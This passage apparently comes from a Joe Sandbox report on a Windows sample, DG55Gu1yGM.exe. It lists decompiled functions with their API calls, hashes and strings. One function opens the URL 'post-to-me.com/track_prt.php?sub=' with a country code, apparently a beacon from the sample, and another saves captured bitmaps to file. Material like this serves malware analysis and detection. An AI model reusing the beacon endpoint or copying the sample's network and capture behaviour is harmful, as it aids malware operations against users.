Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0213B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0213B152

Part of subcall function 02131188: _SpinWait.LIBCONCRT ref: 021311A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0213B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0213B198
List.LIBCMT ref: 0213B21B
List.LIBCMT ref: 0213B22A

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: 6d5143f7d9768fafb62a8399229f74f1e6f0d87856bea6590b3ecb6b789464af
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 0F316872D88616EFCB16EFA4D9806EDBBB3BF04308F05416AC81177641EB716A18CB90

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 021250C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 021250A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 021250B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0212511C
__Getcoll.LIBCPMT ref: 0212512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0212513B

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 7964ea037ca85516b3ea810b4f11b8789bbeb30e667e06ab85442c7c8a63071f
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: F821AF71894268EFDB04EFA4C4847DCBBB2FF50725F50800AF085AB280DB745568CF95

Function 021521C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0212DAD7,0212DAD7,00000002,0214ED35,02153951,00000000,?,02146A05,00000002,00000000,00000000,00000000,?,0212CF88,0212DAD7,00000004), ref: 021521CA
_free.LIBCMT ref: 021521FF
_free.LIBCMT ref: 02152226
SetLastError.KERNEL32(00000000,?,0212DAD7), ref: 02152233
SetLastError.KERNEL32(00000000,?,0212DAD7), ref: 0215223C

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: e840d4f8b1978bdcfc8cb6c4ced8781480f2ca46fdd6a0731cb8064ea5571d1b
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 8001F93B2C5720FF93162B345C88E1B266EABD177272101F9FC35D3290EFB089058569

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 02152141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
_free.LIBCMT ref: 02152178
_free.LIBCMT ref: 021521A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: dcd9c53eddf64fe3f4c22905eddcbe51db6864f5fe605f0599e44cc774b0d0ae
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: A3F0A9371C4620FFD2162734AC88B1B266A5FC2F72F1501A5FD3892290EF7185058569

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 02137B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 021329A4: TlsGetValue.KERNEL32(?,?,02130DC2,02132ECF,00000000,?,02130DA0,?,?,?,00000000,?,00000000), ref: 021329AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02137BB1

Part of subcall function 0214121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02141241
Part of subcall function 0214121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0214125A
Part of subcall function 0214121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021412D0
Part of subcall function 0214121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021412D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02137BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02137BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02137BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02137BF1

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: f63152ff325f47e5f73778924c54507dc54aec0e3b671b2fbe79e0ec139767f4
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 4DF0F6716802186FCE27B775981096DF7379F80B14B10416AD80493290EF359E068FD2

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 0215A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0215A0C4

Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9

_free.LIBCMT ref: 0215A0D6
_free.LIBCMT ref: 0215A0E8
_free.LIBCMT ref: 0215A0FA
_free.LIBCMT ref: 0215A10C

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: b49803ec2a16db3007e3265900640c58f144a5de1bcd8167c9f549f7574a9de5
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 2DF068325C5320EF8660EB54E8C6C0673DAAF043907640ED9F834D7B11CB71F8D08A99

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 0213CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0213CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0213CF67
GetCurrentThread.KERNEL32 ref: 0213CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0213CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0213CF8C

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 78800e08dbe0351f2a9e933addb3997dec178c3e118be8cc90afbd77a71011b0
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 6AF0A036280900DFCA27FF21FA908BBB7BBAFC4610310465DE59B86550CF21A807DFA1

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 02122E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02122E8E

Part of subcall function 02121321: _wcslen.LIBCMT ref: 02121328
Part of subcall function 02121321: _wcslen.LIBCMT ref: 02121344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 021230A1

Strings

&cc=DE, xrefs: 0212301B, 02123021, 0212307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 02122EBE, 02122FEA, 02123059

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 31af903991bb9adc28afed7a758ada7f6d26f274f266f6f99df73241b9e4e0d7
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 16515195E55344A9E320EFB0BC45B723378FF58712F10643AE528CB2B2E7A19944C71E

Function 02148937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0214896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02148A23

Strings

csm, xrefs: 02148A0D
fB, xrefs: 02148A15, 02148A1E, 02148A2F

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 50a3401eae9d71a00c58095fec5b590a339b8b807a30b5f4e4b9c54712f1e65e
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 3341F630A80249AFCF10DF28CC44AAE7BA1AF45328F258166D9195B391CB72E901CF91

Function 0214F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DG55Gu1yGM.exe,00000104), ref: 0214F9BA
_free.LIBCMT ref: 0214FA85
_free.LIBCMT ref: 0214FA8F

Strings

C:\Users\user\Desktop\DG55Gu1yGM.exe, xrefs: 0214F9B1, 0214F9B8, 0214F9E7, 0214FA1F

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DG55Gu1yGM.exe
API String ID: 2506810119-1612166485
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 6d31d7b4518771c9a3d5a4bc66c727a35edbaaa8e0d4bfe830f9516c2ce4d7e4
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 58316171A80258EFDB21DF95DC84D9EBBFDEF89710B2040A7E80997711DB709A41CB91

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DG55Gu1yGM.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\DG55Gu1yGM.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DG55Gu1yGM.exe
API String ID: 2506810119-1612166485
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 02159372 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

Part of subcall function 02159491: _free.LIBCMT ref: 021594F7

Part of subcall function 02159106: GetOEMCP.KERNEL32(00000000), ref: 02159131

_free.LIBCMT ref: 021593EA
_free.LIBCMT ref: 02159420

Strings

8JV, xrefs: 02159469
8JV, xrefs: 02159464

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: 8JV$8JV
API String ID: 3291180501-2462513189
Opcode ID: c947c04c6369be2b0b67581f9f5cbea0d3a159dd71843e43509783f1e1aa6e4f
Instruction ID: fbf8e1633d6a84a8c4bc7d460918f13878bc41c49e6afb97b26c252c6684c690
Opcode Fuzzy Hash: c947c04c6369be2b0b67581f9f5cbea0d3a159dd71843e43509783f1e1aa6e4f
Instruction Fuzzy Hash: BC31D331944224EFDB10DFA9D580BAEB7E1EF44364F1541DAED249B290EB729D41CF81

Function 0043910B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 0043922A: _free.LIBCMT ref: 00439290

Part of subcall function 00438E9F: GetOEMCP.KERNEL32(00000000), ref: 00438ECA

_free.LIBCMT ref: 00439183
_free.LIBCMT ref: 004391B9

Strings

8JV, xrefs: 004391FD
8JV, xrefs: 00439202

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorLast
String ID: 8JV$8JV
API String ID: 3291180501-2462513189
Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
Instruction ID: 97d82b3a2133808e380870247b9945ea31129e8917de2cc4f3b867beb4678205
Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
Instruction Fuzzy Hash: 63312731904205AFEF10EF99D444A5EB7F1EF48324F14119FE80467391DB799E40CB48

Function 02153834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,02153752,?,?,?,?,?,?,?,?,?,004412BD,000000FF), ref: 0215388A
GetLastError.KERNEL32(?,02153752,?,?,?,?,?,?,?,?,?,004412BD,000000FF), ref: 02153894
__dosmaperr.LIBCMT ref: 021538BF

Strings

0>V, xrefs: 0215384E

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: 0>V
API String ID: 2583163307-417846078
Opcode ID: ebdca8a1c7adbe074858f504d58375f2f4c191b84cfa181ab901558326dc3e0e
Instruction ID: 66a040b304a3e00e15df18a2fa2a51a5e4d3e5a64af503680d9fa835c9a2ab0f
